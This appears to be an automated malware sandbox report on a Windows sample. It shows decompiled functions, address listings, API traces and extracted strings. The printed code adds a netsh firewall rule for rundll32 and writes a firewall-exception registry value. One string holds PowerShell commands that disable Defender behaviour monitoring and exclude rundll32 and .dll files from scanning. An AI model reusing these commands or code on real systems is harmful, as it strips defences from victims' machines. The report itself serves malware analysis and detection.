								if(_t40 != 0) {
									goto L27;
								}
								goto L47;
							}
						}
						goto L24;
					}
				}
				L14:
				_t96 =  &(_t96[1]);
				goto L14;
			}



































                                                                0x004024bd
                                                                0x004024c3
                                                                0x004024c9
                                                                0x004024c9
                                                                0x004024cf
                                                                0x004024d4
                                                                0x004024d6
                                                                0x004024d6
                                                                0x004024d9
                                                                0x004024e8
                                                                0x00000000
                                                                0x004024e8
                                                                0x004024db
                                                                0x004024e0
                                                                0x004024e0
                                                                0x004024e0
                                                                0x004024e2
                                                                0x004024e3
                                                                0x004024e4
                                                                0x00000000
                                                                0x00000000
                                                                0x004024e6
                                                                0x004024e9
                                                                0x004024e9
                                                                0x004024e9
                                                                0x004024ec
                                                                0x004024f4
                                                                0x004024f5
                                                                0x004024f6
                                                                0x004024f8
                                                                0x00402506
                                                                0x00402507
                                                                0x00402508
                                                                0x0040250a
                                                                0x00402513
                                                                0x00402515
                                                                0x00402517
                                                                0x00402519
                                                                0x0040251a
                                                                0x0040251c
                                                                0x0040251f
                                                                0x00402522
                                                                0x00402524
                                                                0x00402525
                                                                0x0040252d
                                                                0x00402539
                                                                0x00402539
                                                                0x0040253b
                                                                0x0040253c
                                                                0x0040253d
                                                                0x00402544
                                                                0x0040254c
                                                                0x00402553
                                                                0x00402553
                                                                0x00402557
                                                                0x00000000
                                                                0x00000000
                                                                0x0040255f
                                                                0x00000000
                                                                0x00402561
                                                                0x00402561
                                                                0x00402564
                                                                0x0040256b
                                                                0x00402571
                                                                0x00402573
                                                                0x00402573
                                                                0x00402578
                                                                0x0040257d
                                                                0x00402591
                                                                0x00402593
                                                                0x00402598
                                                                0x0040259b
                                                                0x004025a0
                                                                0x004025a5
                                                                0x004025ac
                                                                0x004025b3
                                                                0x004025bb
                                                                0x004025c2
                                                                0x004025c2
                                                                0x004025c6
                                                                0x00000000
                                                                0x00000000
                                                                0x004025ce
                                                                0x00000000
                                                                0x004025d8
                                                                0x004025df
                                                                0x004025df
                                                                0x004025ee
                                                                0x004025ee
                                                                0x004025f0
                                                                0x004025f8
                                                                0x004025fe
                                                                0x00402604
                                                                0x0040260c
                                                                0x00402623
                                                                0x00402628
                                                                0x0040264e
                                                                0x00402659
                                                                0x00402663
                                                                0x0040266c
                                                                0x00402679
                                                                0x0040267b
                                                                0x0040268b
                                                                0x00402698
                                                                0x0040269a
                                                                0x004026aa
                                                                0x004026ba
                                                                0x004026ca
                                                                0x004026da
                                                                0x004026da
                                                                0x004026da
                                                                0x004026ca
                                                                0x004026ba
                                                                0x004026aa
                                                                0x00000000
                                                                0x0040269a
                                                                0x0040268d
                                                                0x0040268f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00402682
                                                                0x004026e1
                                                                0x004026e8
                                                                0x004026e8
                                                                0x004026f1
                                                                0x004026fc
                                                                0x004026fe
                                                                0x0040273c
                                                                0x00402700
                                                                0x0040270b
                                                                0x0040270d
                                                                0x00402734
                                                                0x00402714
                                                                0x00402717
                                                                0x00402722
                                                                0x00402724
                                                                0x0040272c
                                                                0x0040272c
                                                                0x0040270d
                                                                0x00402744
                                                                0x00402744
                                                                0x00402752
                                                                0x00402753
                                                                0x0040275b
                                                                0x0040275d
                                                                0x00402761
                                                                0x00402763
                                                                0x00402765
                                                                0x00402766
                                                                0x00402775
                                                                0x0040277c
                                                                0x00402a4b
                                                                0x00402a56
                                                                0x00402782
                                                                0x00402782
                                                                0x00402783
                                                                0x00402784
                                                                0x00402785
                                                                0x0040278a
                                                                0x0040278f
                                                                0x00402794
                                                                0x0040279c
                                                                0x004027a1
                                                                0x004027a7
                                                                0x004027ae
                                                                0x004027b5
                                                                0x004027b9
                                                                0x004027ba
                                                                0x004027c2
                                                                0x004027c3
                                                                0x004027c4
                                                                0x004027c9
                                                                0x004027cc
                                                                0x004027cc
                                                                0x0040277c
                                                                0x0040267b
                                                                0x0040266e
                                                                0x00402670
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00402672
                                                                0x004025ce
                                                                0x00000000
                                                                0x004025e9
                                                                0x0040255f
                                                                0x00402589
                                                                0x00402589
                                                                0x00000000

                                                                APIs
                                                                • GetCommandLineA.KERNEL32(036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 0040253F
                                                                • lstrlenA.KERNEL32(00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,00000000), ref: 00402547
                                                                • lstrcpyA.KERNEL32(036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 0040259B
                                                                • GetCommandLineA.KERNEL32(036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004025AE
                                                                • lstrlenA.KERNEL32(00000000,036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004025B6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: CommandLinelstrlen$lstrcpy
                                                                • String ID: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll$IsWow64Process$ProductName$R$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 10 Enterprise$Z$kernel32$pubi$subi
                                                                • API String ID: 2924811697-2946237119
                                                                • Opcode ID: 36d645abd151f9e79aa7af88d9b6d85c25858b58ca497b901fa78fc891b05d52
                                                                • Instruction ID: 3f9592e861b59049e43669ab2c2c85c784bb6e17a0021f1f39863acaefa6db71
                                                                • Opcode Fuzzy Hash: 36d645abd151f9e79aa7af88d9b6d85c25858b58ca497b901fa78fc891b05d52
                                                                • Instruction Fuzzy Hash: 5E816730A04201A7EF255729CE5D73B6A959B9A314F20443FE685B73D2CBFD8C528B0E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040110C, Relevance: 40.3, APIs: 15, Strings: 8, Instructions: 85stringregistrythreadCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 96%
                                                                			E0040110C(CHAR* __edx) {
				signed int _t7;
				void* _t9;
				void* _t18;
				CHAR* _t30;

				_t30 = __edx;
				_t7 = GetVersion();
				if(_t7 >= 6) {
					_t9 = E004029FB();
					if(_t9 < 0 || _t9 >= 0x3000) {
						 *0x43f5e9 = 0x6e65706f;
						 *0x43f5ed = 0;
					} else {
						 *0x43f5e9 = 0x616e7572;
						 *0x43f5ed = 0x73;
					}
					 *0x447267 = 0x3c;
					 *0x0044726B = 0x40;
					 *0x00447273 = 0x43f5e9;
					 *((intOrPtr*)(0x447277)) = "netsh.exe";
					 *((intOrPtr*)(0x44727b)) = "advfirewall firewall add rule name=\"Rundll32\" dir=out action=allow protocol=any program=\"C:\\Windows\\system32\\rundll32.exe\"";
					 *0x00447283 = 0;
					GetVersion();
					GetWindowsDirectoryA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", 0x3e8);
					if( *((char*)(lstrlenA(?str?) - 1 + 0x44039c)) != 0x5c) {
						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "\\system32\\WindowsPowershell\\v1.0\\powershell.exe");
					} else {
						lstrcatA("C:\Users\jones\AppData\Local\Temp\cyscuq0veku\safebits.exe", "system32\\WindowsPowershell\\v1.0\\powershell.exe");
					}
				} else {
					_t30 = _t30 ^ _t7;
					"GirewallPolicy\\StandardProfile\\AuthorizedApplications\\List" = "GirewallPolicy\\StandardProfile\\AuthorizedApplications\\List" - 1;
					RegCreateKeyExA(0x80000002, "SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\GirewallPolicy\\StandardProfile\\AuthorizedApplications\\List", 0, 0, 0, 0xf003f, 0, 0x4433fc, 0x443400);
					lstrcpyA(0x440864, 0x4496d3);
					lstrcpyA(0x440c4c, 0x4496d3);
					lstrcatA(0x440c4c, ":*:Enabled:rundll32");
					E0040247D(0x440864, 1, 0x440c4c, lstrlenA(0x440c4c));
					RegCloseKey( *0x4433fc);
				}
				 *0x43f5c2 = 1;
				ExitThread(0); // executed
				_t18 = OpenMutexA(0x100000, 0, _t30);
				if(_t18 != 0) {
					ExitProcess();
					return _t18;
				}
				return _t18;
			}







                                                                0x0040110c
                                                                0x0040110c
                                                                0x00401113
                                                                0x004011a7
                                                                0x004011a9
                                                                0x004011cb
                                                                0x004011d5
                                                                0x004011b1
                                                                0x004011bb
                                                                0x004011c0
                                                                0x004011c0
                                                                0x004011e4
                                                                0x004011ea
                                                                0x004011f1
                                                                0x004011f8
                                                                0x004011ff
                                                                0x00401206
                                                                0x0040120f
                                                                0x0040122b
                                                                0x00401242
                                                                0x0040125f
                                                                0x00401244
                                                                0x0040124e
                                                                0x0040124e
                                                                0x00401119
                                                                0x0040111b
                                                                0x00401134
                                                                0x00401144
                                                                0x00401153
                                                                0x00401162
                                                                0x00401171
                                                                0x0040118d
                                                                0x00401198
                                                                0x00401198
                                                                0x00401264
                                                                0x0040126d
                                                                0x00401280
                                                                0x00401282
                                                                0x00401284
                                                                0x00000000
                                                                0x00401284
                                                                0x00401289

                                                                APIs
                                                                • GetVersion.KERNEL32 ref: 0040110C
                                                                • RegCreateKeyExA.ADVAPI32(80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 00401144
                                                                • lstrcpyA.KERNEL32(00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 00401153
                                                                • lstrcpyA.KERNEL32(00440C4C,004496D3,00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 00401162
                                                                • lstrcatA.KERNEL32(00440C4C,:*:Enabled:rundll32,00440C4C,004496D3,00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 00401171
                                                                • lstrlenA.KERNEL32(00440C4C,00440C4C,:*:Enabled:rundll32,00440C4C,004496D3,00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000,000F003F,00000000,004433FC,00443400), ref: 0040117B
                                                                  • Part of subcall function 0040247D: RegSetValueExA.ADVAPI32(?,00008EDA,?,?,?,?,?,00401192,00440864,00000001,00440C4C,00000000,00440C4C,00440C4C,:*:Enabled:rundll32,00440C4C), ref: 004024A7
                                                                • RegCloseKey.ADVAPI32(00440864,00000001,00440C4C,00000000,00440C4C,00440C4C,:*:Enabled:rundll32,00440C4C,004496D3,00440864,004496D3,80000002,SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List,00000000,00000000,00000000), ref: 00401198
                                                                • GetVersion.KERNEL32 ref: 0040120F
                                                                • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040122B
                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 00401235
                                                                • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040124E
                                                                • ExitThread.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,\system32\WindowsPowershell\v1.0\powershell.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe,000003E8), ref: 0040126D
                                                                • OpenMutexA.KERNEL32 ref: 0040127B
                                                                • ExitProcess.KERNEL32(00100000,00000000,UEFIConfig,004012FD,?,?,52b-6f11-481e-99be-b28317af8e3d,00100000,00000000,52b-6f11-481e-99be-b28317af8e3d,00000001,00000000,00000008,002C4024,00401109,00000000), ref: 00401284
                                                                Strings
                                                                • \system32\WindowsPowershell\v1.0\powershell.exe, xrefs: 00401255
                                                                • advfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe", xrefs: 004011FF
                                                                • netsh.exe, xrefs: 004011F8
                                                                • C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe, xrefs: 00401226, 00401230, 00401249, 0040125A
                                                                • :*:Enabled:rundll32, xrefs: 00401167
                                                                • SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 0040113A
                                                                • UEFIConfig, xrefs: 00401272
                                                                • open, xrefs: 004011BB, 004011F1
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: ExitVersionlstrcatlstrcpylstrlen$CloseCreateDirectoryMutexOpenProcessThreadValueWindows
                                                                • String ID: :*:Enabled:rundll32$C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe$SYSTEM\ControlSet001\Services\SharedAccess\Parameters\GirewallPolicy\StandardProfile\AuthorizedApplications\List$UEFIConfig$\system32\WindowsPowershell\v1.0\powershell.exe$advfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe"$netsh.exe$open
                                                                • API String ID: 1502339761-2775499601
                                                                • Opcode ID: ca51713fc446da2fce98747e96986a45f3f431a4da9714b60dfa7991cbd6e5f3
                                                                • Instruction ID: f86a099ff20220eadf8bc6d75ab3a4ac57e3fb5b0f73ee9d2750b17cc6049df9
                                                                • Opcode Fuzzy Hash: ca51713fc446da2fce98747e96986a45f3f431a4da9714b60dfa7991cbd6e5f3
                                                                • Instruction Fuzzy Hash: 9921A270BA0340BAE7187F629C87F5829859B08B09F20647FB6417A1E3CBFC4215476E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040258C, Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 133registrystringlibraryCOMMON
                                                                Download Yara Rule
                                                                C-Code - Quality: 33%
                                                                			E0040258C(CHAR* __ebx, void* __edx, CHAR* __esi, char _a2, char _a3, intOrPtr _a4) {
				intOrPtr _t11;
				long _t24;
				struct HINSTANCE__* _t27;
				intOrPtr* _t34;
				void* _t36;
				char* _t42;
				int _t44;
				void* _t50;
				CHAR* _t53;
				char* _t54;
				intOrPtr* _t59;

				_t50 = __edx;
				 *0x440250 = 0;
				asm("stosd");
				lstrcpyA(__ebx, __esi);
				_t11 =  *0x43f3bc; // 0x753499
				 *((char*)(_t11 - 1)) = 0x20;
				_t42 =  &(__ebx[0x32]);
				_t53 = GetCommandLineA();
				_t44 = lstrlenA(_t53);
				while(1) {
					asm("repne scasb");
					if(_t44 == 0) {
						break;
					}
					if( *_t53 != 0x69627570 || _t53[4] != 0x3d64) {
						continue;
					} else {
						if((_t53[6] & 0x000000ff) != 0x20) {
						}
						break;
					}
				}
				_t54 = _t42;
				asm("stosb");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosb");
				RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20019, 0x440398); // executed
				 *0x440394 = 0x100;
				RegQueryValueExA( *0x440398, "ProductName", 0, 0x443400, "Windows 10 Enterprise", 0x440394); // executed
				RegCloseKey( *0x440398); // executed
				_t24 = GetVersion();
				if(_t24 != 5) {
					L13:
					if(_t24 != 5 || _t24 != 1) {
						if(_t24 != 6) {
							L19:
							if(_t24 != 6 || _t24 != 1) {
								if(_t24 != 6 || _t24 != 2) {
									if(_t24 != 6 || _t24 != 3) {
										if(_t24 != 6 || _t24 != 4) {
											if(_t24 == 0xa) {
											}
										}
									}
								}
							}
							goto L33;
						}
						_t24 = _t24;
						if(_t24 != 0) {
							goto L19;
						}
						goto L33;
					} else {
						L33:
						if( *0x44029c == 0x31) {
						}
						asm("stosb");
						_t27 = GetModuleHandleA("kernel32");
						if(_t27 == 0) {
							asm("stosb");
						} else {
							_t34 = GetProcAddress(_t27, "IsWow64Process");
							if(_t34 == 0 || _t34 == 0xffffffff) {
								asm("stosb");
							} else {
								_t36 = GetCurrentProcess();
								 *_t34(0x440254, _t54);
								_t54 = _t36;
								asm("stosb");
							}
						}
						if( *0x4433cf != 0) {
						}
						asm("stosb");
						asm("pushad");
						asm("lodsw");
						asm("rol ax, 0xd");
						asm("stosw");
						asm("loop 0xfffffff8");
						asm("popad");
						E004027CD();
						ExitProcess(??);
						if(0x4468ea <= 0) {
							ExitProcess();
							return 0x4468ea;
						} else {
							_push(0x4468ea);
							_push(_t50);
							_push(2);
							_a2 = 0x52;
							_a2 = _a2 - 5;
							_a3 = 0x5a;
							_a4 = 0x30090;
							_push(0x55fb);
							_push( *0x440860);
							 *_t59 =  *_t59 - 0xeac38f;
							 *_t59 =  *_t59 + 0xeac391;
							 *_t59 =  *_t59 + 3;
							_push(0x4468ea);
							_push(5);
							_push(_t59 + 0x12);
							_push(0x4468ea);
							_push(0x4027f1);
							 *_t59 =  *_t59 + 1;
							return 0x4468ea;
						}
					}
				}
				_t24 = _t24;
				if(_t24 != 0) {
					goto L13;
				}
				goto L33;
			}














                                                                0x0040258c
                                                                0x00402593
                                                                0x00402598
                                                                0x0040259b
                                                                0x004025a0
                                                                0x004025a5
                                                                0x004025ac
                                                                0x004025b3
                                                                0x004025bb
                                                                0x004025c2
                                                                0x004025c2
                                                                0x004025c6
                                                                0x004025e9
                                                                0x004025e9
                                                                0x004025ce
                                                                0x00000000
                                                                0x004025d8
                                                                0x004025df
                                                                0x004025df
                                                                0x00000000
                                                                0x004025e7
                                                                0x004025ce
                                                                0x004025ee
                                                                0x004025f0
                                                                0x004025f8
                                                                0x004025fe
                                                                0x00402604
                                                                0x0040260c
                                                                0x00402623
                                                                0x00402628
                                                                0x0040264e
                                                                0x00402659
                                                                0x00402663
                                                                0x0040266c
                                                                0x00402679
                                                                0x0040267b
                                                                0x0040268b
                                                                0x00402698
                                                                0x0040269a
                                                                0x004026aa
                                                                0x004026ba
                                                                0x004026ca
                                                                0x004026da
                                                                0x004026da
                                                                0x004026da
                                                                0x004026ca
                                                                0x004026ba
                                                                0x004026aa
                                                                0x00000000
                                                                0x0040269a
                                                                0x0040268d
                                                                0x0040268f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00402682
                                                                0x004026e1
                                                                0x004026e8
                                                                0x004026e8
                                                                0x004026f1
                                                                0x004026fc
                                                                0x004026fe
                                                                0x0040273c
                                                                0x00402700
                                                                0x0040270b
                                                                0x0040270d
                                                                0x00402734
                                                                0x00402714
                                                                0x00402717
                                                                0x00402722
                                                                0x00402724
                                                                0x0040272c
                                                                0x0040272c
                                                                0x0040270d
                                                                0x00402744
                                                                0x00402744
                                                                0x00402752
                                                                0x00402753
                                                                0x0040275b
                                                                0x0040275d
                                                                0x00402761
                                                                0x00402763
                                                                0x00402765
                                                                0x00402766
                                                                0x00402775
                                                                0x0040277c
                                                                0x00402a4b
                                                                0x00402a56
                                                                0x00402782
                                                                0x00402782
                                                                0x00402783
                                                                0x00402784
                                                                0x00402785
                                                                0x0040278a
                                                                0x0040278f
                                                                0x00402794
                                                                0x0040279c
                                                                0x004027a1
                                                                0x004027a7
                                                                0x004027ae
                                                                0x004027b5
                                                                0x004027b9
                                                                0x004027ba
                                                                0x004027c2
                                                                0x004027c3
                                                                0x004027c4
                                                                0x004027c9
                                                                0x004027cc
                                                                0x004027cc
                                                                0x0040277c
                                                                0x0040267b
                                                                0x0040266e
                                                                0x00402670
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000

                                                                APIs
                                                                • lstrcpyA.KERNEL32(036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 0040259B
                                                                • GetCommandLineA.KERNEL32(036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91,"C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004025AE
                                                                • lstrlenA.KERNEL32(00000000,036A101C,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388,kernel32,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll,C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll",jdfddn 6i/91), ref: 004025B6
                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat,C:\Users\user\AppData\Local\Temp\oh161a161.bat,oh161a161.bat,000001F4,C:\Users\user\AppData\Local\Temp\oh161a161.bat,00001388), ref: 00402623
                                                                • RegQueryValueExA.ADVAPI32(ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 0040264E
                                                                • RegCloseKey.ADVAPI32(ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00402659
                                                                • GetVersion.KERNEL32(ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD,C:\Users\user\AppData\Local\Temp\oh161a161.bat), ref: 00402663
                                                                • GetModuleHandleA.KERNEL32(kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD), ref: 004026F7
                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402706
                                                                • GetCurrentProcess.KERNEL32(036A0FEA,kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319), ref: 00402717
                                                                • ExitProcess.KERNEL32(kernel32,ProductName,00000000,00443400,Windows 10 Enterprise,00440394,80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020019,00440398,-00000006,00000000,036A1428,003F1319,00401FDD), ref: 00402775
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811136166.0000000000446000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811154545.000000000044A000.00000040.00020000.sdmp Download File
                                                                Similarity
                                                                • API ID: Process$AddressCloseCommandCurrentExitHandleLineModuleOpenProcQueryValueVersionlstrcpylstrlen
                                                                • String ID: C:\Users\user\AppData\Roaming\IDFcan\jdfddn.dll$IsWow64Process$ProductName$R$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Windows 10 Enterprise$Z$kernel32$pubi
                                                                • API String ID: 3264404344-175066380
                                                                • Opcode ID: 088f9962cafd2997cd9a53981121378ce658c8a836929189c8bfbdf98bcfe1b9
                                                                • Instruction ID: a6c6d2760ff8f028cd5588f6383ab57099b3c3b6c15ba4960ab4bc131dd8bfd0
                                                                • Opcode Fuzzy Hash: 088f9962cafd2997cd9a53981121378ce658c8a836929189c8bfbdf98bcfe1b9
                                                                • Instruction Fuzzy Hash: DB4129346443007AFB256725CD5AB3BAA95AB5A708F14443FF584B72D2DBFC8C014B1E
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 0040000B, Relevance: 33.8, APIs: 11, Strings: 7, Instructions: 2281COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • setupqqadvfirewall firewall add rule name="Rundll32" dir=out action=allow protocol=any program="C:\Windows\system32\rundll32.exe", xrefs: 0040100F
                                                                • netsh.exe, xrefs: 00401058
                                                                • C:\Users\user\AppData\Local\Temp\cyscuq0veku\safebits.exe, xrefs: 0040107B, 00401085, 0040109E, 004010C0
                                                                • jdfddn, xrefs: 004010E3
                                                                • system32\WindowsPowershell\v1.0\powershell.exe, xrefs: 00401099
                                                                • open, xrefs: 00401051
                                                                • Set-MpPreference -DisableBehaviorMonitoring $true ; Set-MpPreference -MAPSReporting 0 ; Set-MpPreference -ExclusionProcess rundll32.exe ; Set-MpPreference -ExclusionExtension dll, xrefs: 004010C7
                                                                Memory Dump Source
                                                                • Source File: 0000000D.00000002.811078300.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 0000000D.00000002.811102499.000000000043C000.00000040.00020000.sdmp Download File
                                                                • Associated: 0000000D.00000002.811121010.0000000000443000.00000040.00020000.sdmp Download File
